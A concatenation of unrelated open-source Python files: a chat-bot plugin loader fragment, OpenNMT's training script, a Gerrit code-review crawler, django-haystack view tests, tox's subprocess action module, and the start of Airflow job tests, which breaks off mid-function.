plugin_warnings.append(meta["warnings"])
if "required_settings" in meta:
for s in meta["required_settings"]:
self.required_settings_from_plugins[s] = {
"plugin_name": plugin_name,
"function_name": function_name,
"setting_name": s,
}
if (
"listens_to_messages" in meta
and meta["listens_to_messages"]
and "listener_regex" in meta
):
# puts("- %s" % function_name)
regex = meta["listener_regex"]
if not meta["case_sensitive"]:
regex = "(?i)%s" % regex
help_regex = meta["listener_regex"]
if meta["listens_only_to_direct_mentions"]:
help_regex = "@%s %s" % (settings.WILL_HANDLE, help_regex)
self.all_listener_regexes.append(help_regex)
if meta["__doc__"]:
pht = plugin_info.get("parent_help_text", None)
if pht:
if pht in self.help_modules:
self.help_modules[pht].append(u"%s" % meta["__doc__"])
else:
self.help_modules[pht] = [u"%s" % meta["__doc__"]]
else:
self.help_modules[OTHER_HELP_HEADING].append(u"%s" % meta["__doc__"])
if meta["multiline"]:
compiled_regex = re.compile(regex, re.MULTILINE | re.DOTALL)
else:
compiled_regex = re.compile(regex)
if plugin_info["class"] in plugin_instances:
instance = plugin_instances[plugin_info["class"]]
else:
instance = plugin_info["class"](bot=self)
plugin_instances[plugin_info["class"]] = instance
full_method_name = "%s.%s" % (plugin_info["name"], function_name)
cleaned_info = copy.copy(plugin_info)
del cleaned_info["module"]
del cleaned_info["class"]
self.message_listeners[full_method_name] = {
"full_method_name": full_method_name,
"function_name": function_name,
"class_name": plugin_info["name"],
"regex_pattern": meta["listener_regex"],
"regex": compiled_regex,
"fn": getattr(instance, function_name),
"args": meta["listener_args"],
"include_me": meta["listener_includes_me"],
"case_sensitive": meta["case_sensitive"],
"multiline": meta["multiline"],
"direct_mentions_only": meta["listens_only_to_direct_mentions"],
"admin_only": meta["listens_only_to_admin"],
"acl": meta["listeners_acl"],
"plugin_info": cleaned_info,
}
if meta["listener_includes_me"]:
self.some_listeners_include_me = True
elif "periodic_task" in meta and meta["periodic_task"]:
# puts("- %s" % function_name)
self.periodic_tasks.append((plugin_info, fn, function_name))
elif "random_task" in meta and meta["random_task"]:
# puts("- %s" % function_name)
self.random_tasks.append((plugin_info, fn, function_name))
elif "bottle_route" in meta:
# puts("- %s" % function_name)
self.bottle_routes.append((plugin_info["class"], function_name))
except Exception as e:
error(plugin_name)
self.startup_error(
"Error bootstrapping %s.%s" % (
plugin_info["class"],
function_name,
), e
)
if len(plugin_warnings) > 0:
show_invalid(plugin_name)
for w in plugin_warnings:
warn(w)
else:
show_valid(plugin_name)
except Exception as e:
self.startup_error("Error bootstrapping %s" % (plugin_info["class"],), e)
self.save("all_listener_regexes", self.all_listener_regexes)
puts("")
|
train.py
|
#!/usr/bin/env python
"""Train models."""
import os
import signal
import torch
import onmt.opts as opts
import onmt.utils.distributed
from onmt.utils.misc import set_random_seed
from onmt.utils.logging import init_logger, logger
from onmt.train_single import main as single_main
from onmt.utils.parse import ArgumentParser
from onmt.inputters.inputter import build_dataset_iter, patch_fields, \
load_old_vocab, old_style_vocab, build_dataset_iter_multiple
from itertools import cycle
def train(opt):
ArgumentParser.validate_train_opts(opt)
ArgumentParser.update_model_opts(opt)
ArgumentParser.validate_model_opts(opt)
set_random_seed(opt.seed, False)
# Load checkpoint if we resume from a previous training.
if opt.train_from:
logger.info('Loading checkpoint from %s' % opt.train_from)
checkpoint = torch.load(opt.train_from,
map_location=lambda storage, loc: storage)
logger.info('Loading vocab from checkpoint at %s.' % opt.train_from)
vocab = checkpoint['vocab']
else:
vocab = torch.load(opt.data + '.vocab.pt')
# check for code where vocab is saved instead of fields
# (in the future this will be done in a smarter way)
if old_style_vocab(vocab):
fields = load_old_vocab(
vocab, opt.model_type, dynamic_dict=opt.copy_attn)
else:
fields = vocab
# patch for fields that may be missing in old data/model
patch_fields(opt, fields)
if len(opt.data_ids) > 1:
train_shards = []
for train_id in opt.data_ids:
shard_base = "train_" + train_id
train_shards.append(shard_base)
train_iter = build_dataset_iter_multiple(train_shards, fields, opt)
else:
if opt.data_ids[0] is not None:
shard_base = "train_" + opt.data_ids[0]
else:
shard_base = "train"
train_iter = build_dataset_iter(shard_base, fields, opt)
nb_gpu = len(opt.gpu_ranks)
if opt.world_size > 1:
queues = []
mp = torch.multiprocessing.get_context('spawn')
semaphore = mp.Semaphore(opt.world_size * opt.queue_size)
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for device_id in range(nb_gpu):
q = mp.Queue(opt.queue_size)
queues += [q]
procs.append(mp.Process(target=run, args=(
opt, device_id, error_queue, q, semaphore), daemon=True))
procs[device_id].start()
logger.info(" Starting process pid: %d " % procs[device_id].pid)
error_handler.add_child(procs[device_id].pid)
producer = mp.Process(target=batch_producer,
args=(train_iter, queues, semaphore, opt,),
daemon=True)
producer.start()
error_handler.add_child(producer.pid)
for p in procs:
p.join()
producer.terminate()
elif nb_gpu == 1: # case 1 GPU only
single_main(opt, 0)
else: # case only CPU
single_main(opt, -1)
def batch_producer(generator_to_serve, queues, semaphore, opt):
init_logger(opt.log_file)
set_random_seed(opt.seed, False)
# generator_to_serve = iter(generator_to_serve)
def pred(x):
"""
Filters batches that belong only
to gpu_ranks of current node
"""
for rank in opt.gpu_ranks:
if x[0] % opt.world_size == rank:
return True
generator_to_serve = filter(
pred, enumerate(generator_to_serve))
def next_batch(device_id):
new_batch = next(generator_to_serve)
semaphore.acquire()
return new_batch[1]
b = next_batch(0)
for device_id, q in cycle(enumerate(queues)):
b.dataset = None
if isinstance(b.src, tuple):
b.src = tuple([_.to(torch.device(device_id))
for _ in b.src])
else:
b.src = b.src.to(torch.device(device_id))
b.tgt = b.tgt.to(torch.device(device_id))
b.indices = b.indices.to(torch.device(device_id))
b.alignment = b.alignment.to(torch.device(device_id)) \
if hasattr(b, 'alignment') else None
b.src_map = b.src_map.to(torch.device(device_id)) \
if hasattr(b, 'src_map') else None
b.align = b.align.to(torch.device(device_id)) \
if hasattr(b, 'align') else None
b.corpus_id = b.corpus_id.to(torch.device(device_id)) \
if hasattr(b, 'corpus_id') else None
# hack to dodge unpicklable `dict_keys`
b.fields = list(b.fields)
q.put(b)
b = next_batch(device_id)
def run(opt, device_id, error_queue, batch_queue, semaphore):
""" run process """
try:
gpu_rank = onmt.utils.distributed.multi_init(opt, device_id)
if gpu_rank != opt.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
single_main(opt, device_id, batch_queue, semaphore)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((opt.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def _get_parser():
parser = ArgumentParser(description='train.py')
opts.config_opts(parser)
opts.model_opts(parser)
opts.train_opts(parser)
return parser
def main():
parser = _get_parser()
opt = parser.parse_args()
train(opt)
if __name__ == "__main__":
main()
|
crawl.py
|
import simplejson
import requests
import os
import threading
import config
# projects
projects = ['eclipse', 'libreoffice', 'openstack', 'qt']
# code review state
statuses = ['merged', 'abandoned']
# download dir
download_dir = config.download_dir
# RestAPI Url
urls = config.urls
# number of code reviews downloaded in each step
num_one_step = config.num_one_step
# retrieve all code reviews
def get_changes(project, start_index, status):
if project in urls.keys():
url = urls[project]
url = url + '&q=status:%s&S=%s' % (status, start_index)
print(url)
# Here, we get the byte data, we need to transfer it to string
return requests.get(url).content[4:].decode('utf-8')
return ''
# Code review store path for each project
def project_dir(project, status):
dir_path = os.path.join(download_dir, project)
if not os.path.exists(dir_path):
os.makedirs(dir_path)
status_dir_path = os.path.join(dir_path, status)
if not os.path.exists(status_dir_path):
os.makedirs(status_dir_path)
# make dir for each project
def mkdir_for_projects():
for p in projects:
for s in statuses:
project_dir(p, s)
# remove all logs
def remove_all_logs():
for p in projects:
for s in statuses:
path = p + '-' + s + '.log'
if(os.path.exists(path)):
os.remove(path)
def write_file(file_path, message):
file_obj = open(file_path, 'w', encoding='utf-8')
file_obj.write(message)
file_obj.close()
# download threads
def download(project, status, start_index=0, one_step=100):
print(project + ": " + status + " download")
has_more = True
dir_path = os.path.join(download_dir, project, status)
# Log file initialization
logfile_name = config.log_path(project, status)
log_obj = open(logfile_name, 'a+')
log_obj.write('start log\n')
try_num = 3
while has_more:
file_name = '%s-%s.json' % (start_index, start_index + num_one_step - 1)
file_path = os.path.join(dir_path, file_name)
try:
if os.path.exists(file_path):
start_index = start_index + one_step
continue
changes_str = get_changes(project, start_index, status)
except:
if try_num > 0:
try_num = try_num - 1
else:
try_num = 3
log_message = '%s %s %s to %s exception!' % (
project, status, start_index, start_index + num_one_step - 1)
print(log_message)
log_obj.write(log_message + '\n')
start_index = start_index + one_step
pass
change_dict_list = simplejson.loads(changes_str)
if len(change_dict_list) == 0:
break
# length less than number of step, indicate the code review download complete
if len(change_dict_list) < num_one_step:
break
write_file(file_path, changes_str)
log_message = '%s %s %s to %s has downloaded!' % (project, status, start_index, start_index+num_one_step-1)
log_obj.write(log_message+'\n')
print(log_message)
start_index = start_index + one_step
log_obj.write('end log\n')
print(project + " end")
log_obj.close()
if __name__ == '__main__':
mkdir_for_projects()
remove_all_logs()
# create thread for each project and each state
for p in projects:
for s in statuses:
t = threading.Thread(target=download, args=(p, s, 0, 100,))
t.start()
|
test_views.py
|
import queue
import time
from threading import Thread
from django import forms
from django.http import HttpRequest, QueryDict
from django.test import TestCase, override_settings
from django.urls import reverse
from test_haystack.core.models import AnotherMockModel, MockModel
from haystack import connections, indexes
from haystack.forms import FacetedSearchForm, ModelSearchForm, SearchForm
from haystack.query import EmptySearchQuerySet
from haystack.utils.loading import UnifiedIndex
from haystack.views import FacetedSearchView, SearchView, search_view_factory
class InitialedSearchForm(SearchForm):
q = forms.CharField(initial="Search for...", required=False, label="Search")
class BasicMockModelSearchIndex(indexes.BasicSearchIndex, indexes.Indexable):
def get_model(self):
return MockModel
class BasicAnotherMockModelSearchIndex(indexes.BasicSearchIndex, indexes.Indexable):
def get_model(self):
return AnotherMockModel
class SearchViewTestCase(TestCase):
fixtures = ["base_data"]
def setUp(self):
super().setUp()
# Stow.
self.old_unified_index = connections["default"]._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.bammsi = BasicAnotherMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.bammsi])
connections["default"]._index = self.ui
# Update the "index".
backend = connections["default"].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
def tearDown(self):
connections["default"]._index = self.old_unified_index
super().tearDown()
def test_search_no_query(self):
response = self.client.get(reverse("haystack_search"))
self.assertEqual(response.status_code, 200)
def test_search_query(self):
response = self.client.get(reverse("haystack_search"), {"q": "haystack"})
self.assertEqual(response.status_code, 200)
self.assertIn("page", response.context)
self.assertNotIn("page_obj", response.context)
self.assertEqual(len(response.context[-1]["page"].object_list), 3)
self.assertEqual(
response.context[-1]["page"].object_list[0].content_type(), "core.mockmodel"
)
self.assertEqual(response.context[-1]["page"].object_list[0].pk, "1")
def test_invalid_page(self):
response = self.client.get(
reverse("haystack_search"), {"q": "haystack", "page": "165233"}
)
self.assertEqual(response.status_code, 404)
def test_empty_results(self):
sv = SearchView()
sv.request = HttpRequest()
sv.form = sv.build_form()
self.assertTrue(isinstance(sv.get_results(), EmptySearchQuerySet))
def test_initial_data(self):
sv = SearchView(form_class=InitialedSearchForm)
sv.request = HttpRequest()
form = sv.build_form()
self.assertTrue(isinstance(form, InitialedSearchForm))
self.assertEqual(form.fields["q"].initial, "Search for...")
para = form.as_p()
self.assertTrue('<label for="id_q">Search:</label>' in para)
self.assertTrue('value="Search for..."' in para)
def test_pagination(self):
response = self.client.get(
reverse("haystack_search"), {"q": "haystack", "page": 0}
)
self.assertEqual(response.status_code, 404)
response = self.client.get(
reverse("haystack_search"), {"q": "haystack", "page": 1}
)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]["page"].object_list), 3)
response = self.client.get(
reverse("haystack_search"), {"q": "haystack", "page": 2}
)
self.assertEqual(response.status_code, 404)
def test_thread_safety(self):
exceptions = []
def threaded_view(resp_queue, view, request):
time.sleep(2)
try:
view(request)
resp_queue.put(request.GET["name"])
except Exception as e:
exceptions.append(e)
raise
class ThreadedSearchView(SearchView):
def __call__(self, request):
print("Name: %s" % request.GET["name"])
return super().__call__(request)
view = search_view_factory(view_class=ThreadedSearchView)
resp_queue = queue.Queue()
request_1 = HttpRequest()
request_1.GET = {"name": "foo"}
request_2 = HttpRequest()
request_2.GET = {"name": "bar"}
th1 = Thread(target=threaded_view, args=(resp_queue, view, request_1))
th2 = Thread(target=threaded_view, args=(resp_queue, view, request_2))
th1.start()
th2.start()
th1.join()
th2.join()
foo = resp_queue.get()
bar = resp_queue.get()
self.assertNotEqual(foo, bar)
def test_spelling(self):
# Stow.
from django.conf import settings
old = settings.HAYSTACK_CONNECTIONS["default"].get("INCLUDE_SPELLING", None)
settings.HAYSTACK_CONNECTIONS["default"]["INCLUDE_SPELLING"] = True
sv = SearchView()
sv.query = "Nothing"
sv.results = []
sv.build_page = lambda: (None, None)
sv.create_response()
context = sv.get_context()
self.assertIn(
"suggestion",
context,
msg="Spelling suggestions should be present even if"
" no results were returned",
)
self.assertEqual(context["suggestion"], None)
# Restore
settings.HAYSTACK_CONNECTIONS["default"]["INCLUDE_SPELLING"] = old
if old is None:
del settings.HAYSTACK_CONNECTIONS["default"]["INCLUDE_SPELLING"]
@override_settings(ROOT_URLCONF="test_haystack.results_per_page_urls")
class ResultsPerPageTestCase(TestCase):
fixtures = ["base_data"]
def setUp(self):
super().setUp()
# Stow.
self.old_unified_index = connections["default"]._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.bammsi = BasicAnotherMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.bammsi])
connections["default"]._index = self.ui
# Update the "index".
backend = connections["default"].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
def tearDown(self):
connections["default"]._index = self.old_unified_index
super().tearDown()
def test_custom_results_per_page(self):
response = self.client.get("/search/", {"q": "haystack"})
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]["page"].object_list), 1)
self.assertEqual(response.context[-1]["paginator"].per_page, 1)
response = self.client.get("/search2/", {"q": "hello world"})
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]["page"].object_list), 2)
self.assertEqual(response.context[-1]["paginator"].per_page, 2)
class FacetedSearchViewTestCase(TestCase):
def setUp(self):
super().setUp()
# Stow.
self.old_unified_index = connections["default"]._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.bammsi = BasicAnotherMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.bammsi])
connections["default"]._index = self.ui
# Update the "index".
backend = connections["default"].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
def tearDown(self):
connections["default"]._index = self.old_unified_index
super().tearDown()
def test_search_no_query(self):
response = self.client.get(reverse("haystack_faceted_search"))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context["facets"], {})
def test_empty_results(self):
fsv = FacetedSearchView()
fsv.request = HttpRequest()
fsv.request.GET = QueryDict("")
fsv.form = fsv.build_form()
self.assertTrue(isinstance(fsv.get_results(), EmptySearchQuerySet))
def test_default_form(self):
fsv = FacetedSearchView()
fsv.request = HttpRequest()
fsv.request.GET = QueryDict("")
fsv.form = fsv.build_form()
self.assertTrue(isinstance(fsv.form, FacetedSearchForm))
def test_list_selected_facets(self):
fsv = FacetedSearchView()
fsv.request = HttpRequest()
fsv.request.GET = QueryDict("")
fsv.form = fsv.build_form()
self.assertEqual(fsv.form.selected_facets, [])
fsv = FacetedSearchView()
fsv.request = HttpRequest()
fsv.request.GET = QueryDict(
"selected_facets=author:daniel&selected_facets=author:chris"
)
fsv.form = fsv.build_form()
self.assertEqual(fsv.form.selected_facets, ["author:daniel", "author:chris"])
class BasicSearchViewTestCase(TestCase):
fixtures = ["base_data"]
def setUp(self):
super().setUp()
# Stow.
self.old_unified_index = connections["default"]._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.bammsi = BasicAnotherMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.bammsi])
connections["default"]._index = self.ui
# Update the "index".
backend = connections["default"].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
def tearDown(self):
connections["default"]._index = self.old_unified_index
super().tearDown()
def test_search_no_query(self):
response = self.client.get(reverse("haystack_basic_search"))
self.assertEqual(response.status_code, 200)
def test_search_query(self):
response = self.client.get(reverse("haystack_basic_search"), {"q": "haystack"})
self.assertEqual(response.status_code, 200)
self.assertEqual(type(response.context[-1]["form"]), ModelSearchForm)
self.assertEqual(len(response.context[-1]["page"].object_list), 3)
self.assertEqual(
response.context[-1]["page"].object_list[0].content_type(), "core.mockmodel"
)
self.assertEqual(response.context[-1]["page"].object_list[0].pk, "1")
self.assertEqual(response.context[-1]["query"], "haystack")
def test_invalid_page(self):
response = self.client.get(
reverse("haystack_basic_search"), {"q": "haystack", "page": "165233"}
)
self.assertEqual(response.status_code, 404)
|
action.py
|
from __future__ import absolute_import, unicode_literals
import os
import pipes
import signal
import subprocess
import sys
import time
from contextlib import contextmanager
from threading import Thread
import py
from tox import reporter
from tox.constants import INFO
from tox.exception import InvocationError
from tox.reporter import Verbosity
from tox.util.lock import get_unique_file
from tox.util.stdlib import is_main_thread
class Action(object):
"""Action is an effort to group operations with the same goal (within reporting)"""
def __init__(
self,
name,
msg,
args,
log_dir,
generate_tox_log,
command_log,
popen,
python,
interrupt_timeout,
terminate_timeout,
):
self.name = name
self.args = args
self.msg = msg
self.activity = self.msg.split(" ", 1)[0]
self.log_dir = log_dir
self.generate_tox_log = generate_tox_log
self.via_popen = popen
self.command_log = command_log
self._timed_report = None
self.python = python
self.interrupt_timeout = interrupt_timeout
self.terminate_timeout = terminate_timeout
def __enter__(self):
msg = "{} {}".format(self.msg, " ".join(map(str, self.args)))
self._timed_report = reporter.timed_operation(self.name, msg)
self._timed_report.__enter__()
return self
def __exit__(self, type, value, traceback):
self._timed_report.__exit__(type, value, traceback)
def setactivity(self, name, msg):
self.activity = name
if msg:
reporter.verbosity0("{} {}: {}".format(self.name, name, msg), bold=True)
else:
reporter.verbosity1("{} {}: {}".format(self.name, name, msg), bold=True)
def info(self, name, msg):
reporter.verbosity1("{} {}: {}".format(self.name, name, msg), bold=True)
def popen(
self,
args,
cwd=None,
env=None,
redirect=True,
returnout=False,
ignore_ret=False,
capture_err=True,
callback=None,
report_fail=True,
):
"""this drives an interaction with a subprocess"""
cwd = py.path.local() if cwd is None else cwd
cmd_args = [str(x) for x in self._rewrite_args(cwd, args)]
cmd_args_shell = " ".join(pipes.quote(i) for i in cmd_args)
stream_getter = self._get_standard_streams(
capture_err, cmd_args_shell, redirect, returnout, cwd,
)
exit_code, output = None, None
with stream_getter as (fin, out_path, stderr, stdout):
try:
process = self.via_popen(
cmd_args,
stdout=stdout,
stderr=stderr,
cwd=str(cwd),
env=os.environ.copy() if env is None else env,
universal_newlines=True,
shell=False,
creationflags=(
subprocess.CREATE_NEW_PROCESS_GROUP
if sys.platform == "win32"
else 0
# needed for Windows signal send ability (CTRL+C)
),
)
except OSError as exception:
exit_code = exception.errno
else:
if callback is not None:
callback(process)
reporter.log_popen(cwd, out_path, cmd_args_shell, process.pid)
output = self.evaluate_cmd(fin, process, redirect)
exit_code = process.returncode
finally:
if out_path is not None and out_path.exists():
lines = out_path.read_text("UTF-8").split("\n")
# first three lines are the action, cwd, and cmd - remove it
output = "\n".join(lines[3:])
try:
if exit_code and not ignore_ret:
if report_fail:
msg = "invocation failed (exit code {:d})".format(exit_code)
if out_path is not None:
msg += ", logfile: {}".format(out_path)
if not out_path.exists():
msg += " warning log file missing"
reporter.error(msg)
if out_path is not None and out_path.exists():
reporter.separator("=", "log start", Verbosity.QUIET)
reporter.quiet(output)
reporter.separator("=", "log end", Verbosity.QUIET)
raise InvocationError(cmd_args_shell, exit_code, output)
finally:
self.command_log.add_command(cmd_args, output, exit_code)
return output
def evaluate_cmd(self, input_file_handler, process, redirect):
try:
if self.generate_tox_log and not redirect:
if process.stderr is not None:
# prevent deadlock
raise ValueError("stderr must not be piped here")
# we read binary from the process and must write using a binary stream
buf = getattr(sys.stdout, "buffer", sys.stdout)
last_time = time.time()
while True:
# we have to read one byte at a time, otherwise there
# might be no output for a long time with slow tests
data = input_file_handler.read(1)
if data:
buf.write(data)
if b"\n" in data or (time.time() - last_time) > 1:
# we flush on newlines or after 1 second to
# provide quick enough feedback to the user
# when printing a dot per test
buf.flush()
last_time = time.time()
elif process.poll() is not None:
if process.stdout is not None:
process.stdout.close()
break
else:
time.sleep(0.1)
# the seek updates internal read buffers
input_file_handler.seek(0, 1)
input_file_handler.close()
out, _ = process.communicate() # wait to finish
except KeyboardInterrupt as exception:
reporter.error("got KeyboardInterrupt signal")
main_thread = is_main_thread()
while True:
try:
if main_thread:
# spin up a new thread to disable further interrupt on main thread
stopper = Thread(target=self.handle_interrupt, args=(process,))
stopper.start()
stopper.join()
else:
self.handle_interrupt(process)
except KeyboardInterrupt:
continue
break
raise exception
return out
def handle_interrupt(self, process):
"""A three level stop mechanism for children - INT -> TERM -> KILL"""
msg = "from {} {{}} pid {}".format(os.getpid(), process.pid)
if process.poll() is None:
self.info("KeyboardInterrupt", msg.format("SIGINT"))
process.send_signal(signal.CTRL_C_EVENT if sys.platform == "win32" else signal.SIGINT)
if self._wait(process, self.interrupt_timeout) is None:
self.info("KeyboardInterrupt", msg.format("SIGTERM"))
process.terminate()
if self._wait(process, self.terminate_timeout) is None:
self.info("KeyboardInterrupt", msg.format("SIGKILL"))
process.kill()
process.communicate()
@staticmethod
def _wait(process, timeout):
if sys.version_info >= (3, 3):
# python 3 has timeout feature built-in
try:
process.communicate(timeout=timeout)
except subprocess.TimeoutExpired:
pass
else:
# on Python 2 we need to simulate it
delay = 0.01
while process.poll() is None and timeout > 0:
time.sleep(delay)
timeout -= delay
return process.poll()
@contextmanager
def _get_standard_streams(self, capture_err, cmd_args_shell, redirect, returnout, cwd):
stdout = out_path = input_file_handler = None
stderr = subprocess.STDOUT if capture_err else None
if self.generate_tox_log or redirect:
out_path = self.get_log_path(self.name)
with out_path.open("wt") as stdout, out_path.open("rb") as input_file_handler:
msg = "action: {}, msg: {}\ncwd: {}\ncmd: {}\n".format(
self.name.replace("\n", " "),
self.msg.replace("\n", " "),
str(cwd).replace("\n", " "),
cmd_args_shell.replace("\n", " "),
)
stdout.write(msg)
stdout.flush()
input_file_handler.read() # read the header, so it won't be written to stdout
yield input_file_handler, out_path, stderr, stdout
return
if returnout:
stdout = subprocess.PIPE
yield input_file_handler, out_path, stderr, stdout
def get_log_path(self, actionid):
log_file = get_unique_file(self.log_dir, prefix=actionid, suffix=".log")
return log_file
def _rewrite_args(self, cwd, args):
executable = None
if INFO.IS_WIN:
# shebang lines are not adhered on Windows so if it's a python script
# pre-pend the interpreter
ext = os.path.splitext(str(args[0]))[1].lower()
if ext == ".py":
executable = str(self.python)
if executable is None:
executable = args[0]
args = args[1:]
new_args = [executable]
# to make the command shorter try to use relative paths for all subsequent arguments
# note the executable cannot be relative as the Windows applies cwd after invocation
for arg in args:
if arg and os.path.isabs(str(arg)):
arg_path = py.path.local(arg)
if arg_path.exists() and arg_path.common(cwd) is not None:
potential_arg = cwd.bestrelpath(arg_path)
if len(potential_arg.split("..")) < 2:
# just one parent directory accepted as relative path
arg = potential_arg
new_args.append(str(arg))
return new_args
|
test_jobs.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import threading
import time
import unittest
from tempfile import mkdtemp
import psutil
import six
import sqlalchemy
from mock import Mock, patch, MagicMock, PropertyMock
from airflow.utils.db import create_session
from airflow import AirflowException, settings, models, configuration
from airflow.bin import cli
import airflow.example_dags
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BaseJob, BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagRun, Pool, TaskInstance as TI
from airflow.orm import DagBag
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.net import get_hostname
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.core import TEST_DAG_FOLDER
from tests.executors.test_executor import TestExecutor
configuration.load_test_config()
logger = logging.getLogger(__name__)
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TRY_NUMBER = 1
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class BaseJobTest(unittest.TestCase):
class TestJob(BaseJob):
__mapper_args__ = {
'polymorphic_identity': 'TestJob'
}
def __init__(self, cb):
self.cb = cb
super(BaseJobTest.TestJob, self).__init__()
def _execute(self):
return self.cb()
def test_state_success(self):
job = self.TestJob(lambda: True)
job.run()
self.assertEquals(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_sysexit(self):
import sys
job = self.TestJob(lambda: sys.exit(0))
job.run()
self.assertEquals(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_failed(self):
def abort():
raise RuntimeError("fail")
job = self.TestJob(abort)
with self.assertRaises(RuntimeError):
job.run()
self.assertEquals(job.state, State.FAILED)
self.assertIsNotNone(job.end_date)
class BackfillJobTest(unittest.TestCase):
def setUp(self):
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(include_examples=True)
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
dag.clear()
target_dag.clear()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertFalse(queue.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertTrue(queue.append.called)
target_dag.clear()
dag.clear()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
ignore_first_depends_on_past=True
)
job.run()
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id == 'example_bash_operator'
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_examples(self):
"""
Test backfilling example dags
Try to backfill some of the example dags. Be carefull, not all dags are suitable
for doing this. For example, a dag that sleeps forever, or does not have a
schedule won't work here since you simply can't backfill them.
"""
include_dags = {
'example_branch_operator',
'example_bash_operator',
'example_skip_dag',
'latest_only'
}
dags = [
dag for dag in self.dagbag.dags.values()
if 'example_dags' in dag.full_filepath and dag.dag_id in include_dags
]
for dag in dags:
dag.clear(
start_date=DEFAULT_DATE,
